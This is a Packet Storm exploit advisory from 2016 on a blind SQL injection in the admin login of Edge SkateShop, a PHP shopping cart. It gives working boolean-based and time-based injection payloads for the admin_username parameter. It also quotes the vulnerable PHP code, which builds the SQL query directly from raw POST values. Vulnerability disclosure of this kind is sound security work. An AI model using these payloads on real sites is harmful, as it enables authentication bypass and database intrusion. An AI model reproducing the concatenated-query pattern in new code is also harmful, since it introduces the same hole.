Edge SkateShop Blind SQL Injection

2016-12-16T00:00:00
ID PACKETSTORM:140184
Type packetstorm
Reporter Andrea Bocchetti
Modified 2016-12-16T00:00:00

Description

                                        
                                            `# Exploit Title: Edge SkateShop Blind Sql Injection  
# Date: 12/12/2016  
# Exploit Author: Andrea Bocchetti  
# Vendor HomePage: http://www.sourcecodester.com/php/10964/basic-shopping-cartphpmysql.html  
# Software Link: http://www.sourcecodester.com/sites/default/files/download/gebbz/edgesketch.zip  
# Version : n/a  
# Tested on: kali linux  
  
# Proof of Concept (Using SQLMap) :  
  
Parameter: admin_username (POST)  
Type: boolean-based blind  
Title: OR boolean-based blind - WHERE or HAVING clause  
Payload: admin_username=-8520' OR 6015=6015-- PORX&admin_password=&admin_login=Scmp  
  
Type: AND/OR time-based blind  
Title: MySQL >= 5.0.12 OR time-based blind  
Payload: admin_username=yzsT' OR SLEEP(5)-- Qgnn&admin_password=&admin_login=Scmp  
  
  
Issue :  
if(isset($_POST['admin_login']))  
{  
$admin_username=$_POST['admin_username'];  
$admin_password=$_POST['admin_password'];  
  
  
$check_admin="select * from admin WHERE admin_username='$admin_username' AND admin_password='$admin_password'";  
  
  
$run=mysqli_query($dbcon,$check_admin);  
  
if(mysqli_num_rows($run))  
{  
echo "<script>alert('You're successfully login!')</script>";  
  
echo "<script>window.open('Admin/index.php','_self')</script>";  
  
$_SESSION['admin_username']=$admin_username;  
  
  
  
}  
else  
{  
echo "<script>alert('Username or password is incorrect!')</script>";  
echo "<script>window.open('index.php','_self')</script>";  
  
exit();  
  
}  
`